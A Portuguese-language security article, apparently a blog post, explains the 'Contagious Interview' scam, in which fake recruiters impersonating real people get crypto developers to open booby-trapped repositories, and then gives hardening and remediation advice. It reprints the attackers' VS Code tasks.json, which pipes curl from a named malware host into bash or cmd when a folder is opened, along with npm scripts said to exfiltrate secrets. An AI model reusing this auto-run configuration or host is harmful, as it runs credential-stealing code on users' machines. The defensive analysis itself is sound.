A Entrevista Contagiosa: Como Falsos Recrutadores Hackeiam Desenvolvedores

Resumo: Uma nova onda de ataques patrocinados por estados está mirando desenvolvedores seniores em cripto. Golpistas se passam por recrutadores ou CTOs e fazem o candidato abrir código malicioso. Este artigo disseca o caso "Martin Erazo", o exploit "tasks.json" do VS Code e o "Protocolo de Queima" necessário para sobreviver.

Aviso Legal: Este artigo relata incidentes de cibersegurança específicos envolvendo a representação de indivíduos reais. Os nomes "Martin Erazo" e "Ara Vartanian" referem-se a personas ou identidades usadas pelos atacantes. Acreditamos que as pessoas reais com esses nomes são vítimas inocentes de roubo de identidade e não estão envolvidas nessas atividades maliciosas.

---

Prompts Midjourney

1. /imagine prompt: A dark, moody cybersecurity visualization of a developer's workstation, a red "WARNING" hologram projecting from a VS Code terminal, malicious code tendrils reaching for a crypto wallet icon, text "Contagious Interview" --ar 16:9
2. /imagine prompt: A split screen composition. Left side: A friendly LinkedIn recruiter profile. Right side: A hacker in a hoodie executing a script, matrix code rain in background, text "Social Engineering" --ar 16:9
3. /imagine prompt: A digital shield protecting a laptop, "VS Code Hardening" concept, sleek blue and white cybernetics, defending against red laser attacks --ar 16:9

---

1. A Isca Perfeita: A Persona "Martin Erazo"

Começa com uma mensagem que atinge todos os pontos certos para um engenheiro sênior:

• Cargo: CTO / Arquiteto Líder.
• Orçamento: $6M de financiamento garantido.
• Tecnologia: Web3, IA, Infraestrutura Descentralizada.

Em ataques recentes confirmados, um recrutador usando o nome "Martin Erazo" entra em contato via LinkedIn. O perfil usa o nome e a foto de um diretor de teatro real, mas o histórico de trabalho foi forjado para mudar repentinamente para "Gerenciamento de Projetos de TI" em 2025 — um sinal clássico de conta hackeada ou comprada.

O golpe se move rápido. Eles pulam a triagem padrão de RH e vão direto para uma "entrevista técnica" com a alta gestão — neste caso, personificando o CTO real da indústria Ara Vartanian (atualmente na Limit Break).

Bandeira Vermelha: O nome do projeto muda constantemente. O recrutador vende o "Betfin" (uma plataforma GameFi), mas o deck de apresentação fornecido é para o "SpaceXView" (um projeto de metaverso). Essa inconsistência é a prova de que os golpistas estão reciclando ativos em diferentes campanhas.

2. A Armadilha: "Revise nosso Código MVP"

O falso "CTO" afirma que precisa dos seus olhos experientes no código MVP deles. Eles enviam um link para um repositório GitHub ou um arquivo ZIP. Eles te pressionam para abri-lo durante a entrevista ou imediatamente depois.

É aqui que o ataque acontece.

Eles exploram sua prestatividade e seu ego. Você acha que está lá para encontrar bugs em componentes React. Na realidade, o bug é uma "funcionalidade" projetada para drenar suas economias.

3. O Exploit Técnico: Malware Zero-Click

Os atacantes usam vulnerabilidades "zero-click" ou de "baixo clique" mirando ferramentas de desenvolvimento. Eles não precisam que você execute o aplicativo. Eles só precisam que você abra a pasta.

A Arma Fumegante: .vscode/tasks.json

Neste caso específico, o repositório incluía um arquivo .vscode/tasks.json armado. Este arquivo diz ao VS Code como construir o projeto.

O Código Malicioso:

{
  "tasks": [
    {
      "label": "env",
      "type": "shell",
      "osx": {
        "command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
      },
      "windows": {
        "command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}

• "runOn": "folderOpen": Este é o gatilho fatal. No momento em que você abre a pasta no VS Code, essa tarefa é executada automaticamente.
• A Carga: Ela usa curl para baixar um script de vscodesettingtask.vercel.app — um host de malware conhecido disfarçado de API de configurações.
• O Resultado: O script roda na memória e rouba instantaneamente senhas do Chrome, cookies de sessão e chaves SSH.

Plano B: Scripts package.json

Se o exploit do VS Code falhar, eles planta scripts npm:

"scripts": {
    "start": "node server/server.js | react-scripts start",
    "prepare": "node server/server.js"
}

Executar npm install ou npm start aciona server/server.js — um script C2 (Comando e Controle) local que exfiltra suas variáveis de ambiente (Chaves AWS, Seeds de Carteira) para o atacante.

4. Bandeiras Vermelhas vs Bandeiras Verdes

Como detectar isso antes de ser tarde demais?

Se você é um desenvolvedor, "repositórios privados" ou arquivos ZIP devem te deixar em alerta máximo. Empresas legítimas usam repositórios públicos ou tarefas de casa através de plataformas padrão.

Aviso: Esta não é a única maneira de desenvolvedores serem atacados. Leia sobre a Armadilha do Colaborador no Discord e como Ataques à Cadeia de Suprimentos comprometem dependências.

5. Protocolo de Segurança: Como Entrevistar com Segurança

Se você é um desenvolvedor sênior, você será alvo. Endurecer seu ambiente é obrigatório.

Protocolo 1: O Ambiente "Burner" (Descartável)

NUNCA use sua estação de trabalho principal para testes de código.

• Máquinas Virtuais: Use VirtualBox ou VMWare.
• IDEs na Nuvem: Use GitHub Codespaces ou Gitpod. Eles são efêmeros e isolados dos arquivos da sua carteira local.

Protocolo 2: Auditoria Forense

Antes de sequer abrir código desconhecido:

1. Cheque .vscode/tasks.json: Procure por runOn: folderOpen.
2. Cheque package.json: Procure por scripts preinstall ou postinstall suspeitos.
3. Busca de Palavras-Chave: Faça um grep por curl, wget, os.homedir(), .ssh, wallet.

Protocolo 3: Endurecimento do VS Code

Desative "Confiança no Workspace" (Workspace Trust) globalmente.

• Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always.
• Isso força o VS Code a pedir permissão antes de executar qualquer tarefa em nível de pasta.

6. Remediação: "O Protocolo de Queima"

Se você abriu um repositório malicioso (como o enviado pela persona "Martin Erazo"), assuma que está comprometido. Restaurar o sistema não é suficiente.

1. Corte a Conexão: Desconecte o cabo ethernet imediatamente.
2. Queime as Carteiras: Suas chaves privadas foram perdidas. Crie novas carteiras em um dispositivo limpo (celular) e mova quaisquer fundos restantes. Nunca mais use as seeds antigas.
3. Mate as Sessões: Saia de todos os dispositivos no Google, GitHub, AWS. Revogue todas as sessões ativas.
4. Auditoria de Chaves SSH: Verifique suas configurações de GitHub/GitLab. Atacantes frequentemente adicionam as chaves SSH deles para manter acesso backdoor. Apague qualquer chave que não reconheça.
5. Destruição Total (Nuke It): Limpe o drive e reinstale o SO. É a única maneira de ter 100% de certeza de que rootkits se foram.

Conclusão

O golpe da "Entrevista Contagiosa" arma sua própria expertise contra você. Ele mira sua vontade de resolver problemas. Mas na Web3, paranoia é uma virtude profissional. Verifique cada identidade, coloque em sandbox cada repositório e nunca confie em um "recrutador" que tem pressa para que você escreva código.